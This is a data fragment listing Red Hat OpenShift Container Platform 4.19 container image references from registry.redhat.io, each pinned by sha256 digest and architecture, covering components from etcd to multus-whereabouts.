"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
